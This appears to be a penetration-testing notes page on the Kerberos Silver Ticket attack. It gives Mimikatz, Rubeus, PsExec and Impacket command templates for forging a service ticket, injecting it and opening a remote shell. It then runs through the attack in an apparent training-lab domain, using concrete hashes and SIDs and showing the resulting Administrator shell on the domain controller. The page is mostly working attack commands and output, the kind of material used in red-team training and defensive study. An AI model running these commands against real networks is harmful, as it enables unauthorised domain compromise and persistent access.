# Silver Ticket

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2F7ydZ3B21fgPvtO3Bfm5o%2Fimage.png?alt=media&#x26;token=21246ef4-75d6-4506-a1b7-52ae6860ea4b" alt=""><figcaption></figcaption></figure>

## Silver Ticket

In Silver Ticket attack, we forge the TGS to gain access to a service, without needing to compromise a domain controller.

* We first compromise a service account by obtaining NTLM hash or Kerberos key.
* Forge the TGS using Mimikatz
* Use the forged TGS to authenticate to the specific service as the compromised account.
* Unlike Golden Ticket that uses TGT, Silver Ticket attacks do not require any interaction with DC, making it **stealthier**.
* Note: Golden ticket provides access to any service on any machine, where as Silver Ticket only provides access to particular service on a particular machine. Golden Ticket could last 6 months where as Silver expires in 30 days.&#x20;

### Windows:

{% code overflow="wrap" %}

```
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```

{% endcode %}

### Linux:

{% code overflow="wrap" %}

```
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```

{% endcode %}

### Attack in Practice:

When we have the DC/DA hash, we can create a Silver Ticket that provides access to a service of DC. Once the ticket is imported, we can get a shell as DC.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"># ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600
/renewmax:10080 /ptt" "exit"

# Similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more

<strong># Since the ticket is imported, we can get a shell as DC and execute commands.
</strong>
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
</code></pre>

##